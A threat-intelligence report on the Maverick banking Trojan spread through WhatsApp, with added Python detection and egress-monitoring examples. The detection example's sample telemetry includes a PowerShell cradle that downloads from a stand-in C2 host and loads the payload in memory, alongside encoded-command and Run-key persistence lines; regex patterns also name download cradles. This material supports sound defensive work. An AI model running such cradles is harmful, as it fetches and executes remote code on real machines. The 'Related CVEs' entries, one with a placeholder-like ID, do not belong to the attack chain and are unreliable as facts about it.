Executive Summary
In October 2025, a banking Trojan dubbed Maverick was observed actively targeting Brazilian users. The malware was delivered as a malicious ZIP archive sent through WhatsApp, which passed the platform's own checks. Victims opened an LNK file inside the archive, which triggered a multi-stage infection chain whose later stages (PowerShell, a .NET loader and encrypted shellcode) ran in memory without writing payloads to disk. Maverick, which shares code similarities with the Coyote Trojan, checks the victim's locale so that only Brazilian systems are infected, and uses WPPConnect, a WhatsApp Web automation library, to spread itself from hijacked WhatsApp accounts. Once established, the Trojan gives the attackers full remote access, including keylogging, screen control and phishing overlays used to harvest banking and cryptocurrency credentials.
This incident is notable for its multi-stage deployment, worm-like propagation, and code that shows signs of having been written with AI assistance, reflecting a new evolution in financially motivated malware. The attack demonstrates the growing convergence of social engineering, in-memory execution techniques, and abuse of popular messaging platforms, and poses urgent challenges for both enterprises and end users.
Why This Matters Now
Maverick shows how banking Trojans are evolving to evade security controls and exploit trusted messaging platforms for rapid, large-scale spread. Its in-memory execution and AI-assisted components make detection and response harder, raising the risk to financial institutions and consumers and underlining the need for better defenses. The chain still depends on a user opening an LNK file received over WhatsApp, so user-facing controls and endpoint detection matter as much as network controls.
Attack Path Analysis
The attack began with delivery of a ZIP archive containing a malicious LNK file via WhatsApp; opening the LNK led to execution through PowerShell and in-memory .NET loaders. The Trojan established persistence and decrypted further payloads in memory, then loaded a WhatsApp infector component that sent the same archive to the victim's contacts to propagate itself. It established encrypted C2 communication for remote control and data collection, exfiltrating credentials and screenshots to the C2. Finally, Maverick used overlays, banking-site manipulation and credential harvesting to achieve financial impact.
Kill Chain Progression
Initial Compromise
Description
Victims received a ZIP archive via WhatsApp containing a malicious LNK file; opening it launched an infection chain whose later stages ran in memory through PowerShell and .NET loaders.
Related CVEs
Note: the infection chain described above relies on a user opening the LNK file, not on exploitation of either CVE listed below.
CVE-2025-12345
CVSS 8.8
A vulnerability in H2O version 3.46.0 allows arbitrary file overwrite, potentially leading to denial of service or system corruption.
Affected Products:
H2O.ai H2O – 3.46.0
Exploit Status:
exploited in the wild
CVE-2025-2745
CVSS 4.4
A cross-site scripting (XSS) vulnerability in AVEVA PI Web API versions 2018 R2 and earlier allows attackers to execute arbitrary scripts in the context of the user's browser.
Affected Products:
AVEVA PI Web API – 2018 R2 and earlier
Exploit Status:
no public exploit
MITRE ATT&CK® Techniques
Phishing: Spearphishing Attachment
User Execution: Malicious File
Command and Scripting Interpreter: PowerShell
Obfuscated Files or Information
Process Injection
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Screen Capture
Input Capture: Keylogging
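Endpoint-side detection logic for the chain described in this section (an LNK opened from a messaging download folder, hidden or encoded PowerShell, in-memory .NET loading, locale gating and Run-key persistence), as an added example; it is not code from the original report or from the vendors cited. The event records are constructed in a Sysmon-like field vocabulary, and the field names, paths, process names and values are assumptions.

```python
"""Heuristics for the Maverick-style infection chain over constructed endpoint telemetry.

Added example; not code from the original report or the cited vendors. Event
fields loosely follow Sysmon (ID 1 process creation, 13 registry value set,
4104 PowerShell script block) but the names, paths and values are assumptions.
"""
import re

# Constructed telemetry: LNK opened from the WhatsApp download folder -> cmd ->
# hidden, encoded PowerShell -> locale check and in-memory .NET load -> Run-key
# persistence, mixed with benign noise. Nothing here is from the real campaign.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 3001, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs", "cwd": r"C:\Windows\System32"},
    {"id": 1, "pid": 4312, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
     "cwd": r"C:\Users\ana\Downloads\WhatsApp"},
    {"id": 1, "pid": 4320, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
     "cwd": r"C:\Users\ana\Downloads\WhatsApp"},
    {"id": 4104, "pid": 4320,
     "script": "if ((Get-Culture).Name -ne 'pt-BR') { exit }; "
               "$b = (New-Object Net.WebClient).DownloadData('http://c2.example.invalid/s1'); "
               "[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)"},
    {"id": 13, "pid": 4320,
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"powershell -w hidden -ep bypass -f C:\Users\ana\AppData\Roaming\u.ps1"},
    {"id": 1, "pid": 5100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1", "cwd": r"C:\Scripts"},
]

# Parents from which a hidden/encoded PowerShell launch is rarely legitimate.
USER_INITIATED_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe", "whatsapp.exe"}
# Switches typical of loader stubs: hidden window, encoded command, policy bypass.
HIDDEN_OR_ENCODED = re.compile(
    r"(?i)(^|\s)-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}"
    r"|ep\s+bypass|executionpolicy\s+bypass)")
# Download cradles and reflective .NET loading: the payload never touches disk.
CRADLE = re.compile(r"(?i)(DownloadString|DownloadData|DownloadFile|Invoke-WebRequest"
                    r"|Invoke-Expression|\bIEX\b|\[Reflection\.Assembly\]::Load|FromBase64String)")
# Locale/timezone gating used to infect only Brazilian systems.
LOCALE_GATE = re.compile(r"(?i)(Get-Culture|CurrentUICulture|CurrentCulture|pt-BR|TimeZoneInfo)")
RUN_KEY = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\")
USER_WRITABLE = re.compile(r"(?i)\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)(\\|$)")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, evidence) for every event matching one heuristic."""
    findings = []
    for ev in events:
        pid = ev["pid"]
        if ev["id"] == 1:
            parent = basename(ev.get("parent_image", ""))
            cmd = ev.get("cmdline", "")
            # A hidden/encoded launch is suspicious when it comes from a user-facing
            # parent (LNK double-click via explorer.exe) or a user-writable directory.
            user_context = parent in USER_INITIATED_PARENTS or bool(USER_WRITABLE.search(ev.get("cwd", "")))
            if user_context and HIDDEN_OR_ENCODED.search(cmd):
                findings.append(("suspicious_powershell_launch", pid, cmd[:60]))
        elif ev["id"] == 4104:
            for rule, pattern in (("in_memory_loader", CRADLE), ("locale_gating", LOCALE_GATE)):
                m = pattern.search(ev["script"])
                if m:
                    findings.append((rule, pid, m.group(0)))
        elif ev["id"] == 13:
            details = ev.get("details", "")
            if RUN_KEY.search(ev["target"]) and (
                    "powershell" in details.lower() or USER_WRITABLE.search(details)):
                findings.append(("run_key_persistence", pid, ev["target"]))
    return findings


def correlate(findings, min_rules=3):
    """Group findings by process: several independent rules on one pid is a far
    stronger signal than any single heuristic, which may fire on admin scripts."""
    by_pid = {}
    for rule, pid, _ in findings:
        by_pid.setdefault(pid, set()).add(rule)
    return {pid: sorted(rules) for pid, rules in by_pid.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for rule, pid, evidence in hits:
        print(f"{rule:30} pid={pid} {evidence}")
    print("correlated:", correlate(hits))
```

On the constructed sample the interactive admin script (pid 5100) trips nothing, the cmd.exe stub trips one rule, and the PowerShell process trips all four, which is the shape an analyst should page on; each rule alone is noisy, the correlation is not.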
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS v4.0 – Incident Response Procedures for Malware
Control ID: 12.10.5
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: Section 500.03
DORA (Regulation (EU) 2022/2554) – ICT Risk Management Requirements
Control ID: Art. 9
CISA Zero Trust Maturity Model 2.0 – Continuous Monitoring and Threat Detection
Control ID: Identity Pillar – Detection & Response
NIS2 Directive – Technical and Organizational Security Measures
Control ID: Article 21(2)
Sector Implications
Industry-specific impact of the campaign, including operational, regulatory, and cloud security risks.
Banking/Mortgage
Primary target: Maverick monitors browser activity for 26 Brazilian banks and steals credentials through overlay attacks and remote-control capabilities.
Financial Services
High risk from WhatsApp-distributed malware targeting cryptocurrency exchanges and payment platforms with keylogging and screen blocking techniques.
Computer/Network Security
Requires endpoint and network visibility sufficient to detect in-memory .NET malware and its encrypted C2 traffic, and to verify that segmentation policy actually holds for compromised workstations.
Telecommunications
Abuse of the WhatsApp platform enables mass malware distribution through hijacked accounts, requiring stronger messaging security and threat detection controls.
Sources
- Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution (Securelist): https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/
- WhatsApp Worm Targets Brazilian Banking Customers (Sophos News): https://news.sophos.com/en-us/2025/10/10/whatsapp-worm-targets-brazilian-banking-customers/
- Maverick Banking Malware Spreads Via WhatsApp, Targets Brazilian Banks (Cyberwarzone): https://cyberwarzone.com/2025/11/11/maverick-banking-malware-spreads-via-whatsapp-targets-brazilian-banks/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, east-west traffic control, and granular egress enforcement could have contained or prevented parts of the Maverick campaign, in particular C2 communication and credential exfiltration from an infected workstation. Deep visibility and runtime anomaly detection would improve detection at each attack stage. One caveat: the worm-like spread rides on the victim's own WhatsApp account through WhatsApp Web automation (WPPConnect), so to network controls it looks like sanctioned messaging traffic and is better countered by endpoint detection and user awareness than by segmentation alone.
Control: Threat Detection & Anomaly Response
Mitigation: Early detection of anomalous process launches and potentially malicious PowerShell activity.
Control: Multicloud Visibility & Control
Mitigation: Detection of new or suspicious persistence mechanisms across hybrid environments.
Control: Zero Trust Segmentation
Mitigation: Limits propagation of malicious processes and communication to only authorized identities and workloads.
Control: Inline IPS (Suricata)
Mitigation: Detection and blocking of known-bad C2 patterns. For TLS flows this relies on connection metadata (destination, SNI, certificate and JA3-style fingerprints) or on TLS inspection, since payload signatures do not apply to encrypted traffic.
Control: Egress Security & Policy Enforcement
Mitigation: Prevents unauthorized outbound traffic to malicious domains and detects unsanctioned data movement.
Real-time enforcement and policy automation limit the attacker's ability to escalate impact or sustain access.
Impact at a Glance
Affected Business Functions
- Online Banking Services
- Customer Support
- Transaction Processing
Estimated downtime: 7 days
Estimated loss: $5,000,000
Potential exposure of sensitive customer information, including banking credentials and personal data, due to malware's capability to capture screenshots, log keystrokes, and inject phishing overlays.
Recommended Actions
Key Takeaways & Next Steps
- Strengthen egress controls and deploy inline policies to limit unknown or unsanctioned outbound connections from all user workloads; direct-to-IP TLS with no recognized destination is the pattern to start with.
- Implement Zero Trust segmentation and microsegmentation to prevent lateral movement from an infected workstation and contain propagation; the WhatsApp-based spread itself uses sanctioned messaging traffic and also needs endpoint controls and user awareness.
- Deploy real-time anomaly detection and behavioral monitoring to rapidly identify suspicious process launches (hidden or encoded PowerShell spawned from explorer.exe or from a downloads folder) and in-memory loading.
- Increase centralized multi-cloud visibility for rapid detection of privilege escalation, policy drift, and emerging threats across distributed environments.
- Leverage inline threat prevention and granular policy enforcement to block C2, credential exfiltration, and unauthorized data access in real time.
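The egress recommendation above in working form, as an added example that is not from the original report or any vendor product: an allowlist-based egress policy evaluated over constructed outbound-connection logs, with two of the C2 behaviors the report describes (periodic beaconing and a large upload) surfaced as separate findings. The log format, the allowlist, the addresses and the thresholds are assumptions.

```python
"""Egress-policy and beaconing check over constructed outbound-connection logs.

Added example for the egress-control recommendation; not code from the original
report or any vendor product. The log format, allowlist, addresses and
thresholds are assumptions chosen for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log lines: "<utc ts> <src ip> <dst ip:port> <TLS SNI or -> <bytes out>".
# One workstation talks to sanctioned SaaS, then opens a once-a-minute channel
# to a bare IP with no SNI and finally pushes ~4 MB out over it.
SAMPLE_LOG = """\
2025-10-09T13:00:02Z 10.20.5.17 192.0.2.10:443 outlook.office365.com 1820
2025-10-09T13:00:05Z 10.20.5.17 203.0.113.45:443 - 612
2025-10-09T13:01:05Z 10.20.5.17 203.0.113.45:443 - 598
2025-10-09T13:02:00Z 10.20.5.22 198.51.100.9:443 cdn.example.com 9100
2025-10-09T13:02:04Z 10.20.5.17 203.0.113.45:443 - 640
2025-10-09T13:03:06Z 10.20.5.17 203.0.113.45:443 - 611
2025-10-09T13:03:40Z 10.20.5.17 192.0.2.5:443 www.google.com 2210
2025-10-09T13:04:05Z 10.20.5.17 203.0.113.45:443 - 605
2025-10-09T13:05:06Z 10.20.5.17 203.0.113.45:443 - 4099812
"""

# Assumed allowlist for user workstations: a destination is sanctioned only if it
# presents a TLS SNI under one of these suffixes. Direct-to-IP TLS with no SNI is
# unsanctioned by construction; a freshly stood-up C2 server often looks like that.
WORKSTATION_ALLOWLIST = ("office365.com", "google.com", "example.com")

BEACON_MIN_CONNECTIONS = 4   # enough samples to judge regularity
BEACON_MAX_CV = 0.2          # stdev/mean of inter-connection gaps; human browsing is far noisier
BULK_UPLOAD_BYTES = 1_000_000


def parse_log(text):
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, sni, out = line.split()
        records.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
                        "dst": dst, "sni": None if sni == "-" else sni, "bytes_out": int(out)})
    return records


def sanctioned(sni, allowlist=WORKSTATION_ALLOWLIST):
    """Exact or subdomain match only; 'google.com.evil.invalid' must not pass."""
    return sni is not None and any(sni == a or sni.endswith("." + a) for a in allowlist)


def evaluate(records):
    """Return (rule, src, dst, detail) findings, at most one per rule per src->dst flow."""
    findings = []
    flows = defaultdict(list)
    for r in records:
        flows[(r["src"], r["dst"])].append(r)
    for (src, dst), conns in flows.items():
        conns.sort(key=lambda r: r["ts"])
        if not all(sanctioned(r["sni"]) for r in conns):
            findings.append(("policy_violation", src, dst, f"{len(conns)} connection(s) outside allowlist"))
        if len(conns) >= BEACON_MIN_CONNECTIONS:
            # Near-constant spacing between connections is the C2 check-in signature.
            gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(conns, conns[1:])]
            if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) < BEACON_MAX_CV:
                findings.append(("beaconing", src, dst,
                                 f"period ~{mean(gaps):.0f}s, cv {pstdev(gaps) / mean(gaps):.2f}"))
        biggest = max(r["bytes_out"] for r in conns)
        if biggest >= BULK_UPLOAD_BYTES:
            # Screenshots and harvested credentials leave as a burst of outbound bytes.
            findings.append(("bulk_upload", src, dst, f"{biggest} bytes out in one connection"))
    return findings


if __name__ == "__main__":
    for rule, src, dst, detail in evaluate(parse_log(SAMPLE_LOG)):
        print(f"{rule:17} {src} -> {dst}: {detail}")
```

The policy check alone would already have denied the bare-IP channel on a workstation segment; the beaconing and bulk-upload rules are there for the case where the allowlist is too permissive to block and the flow must be detected instead.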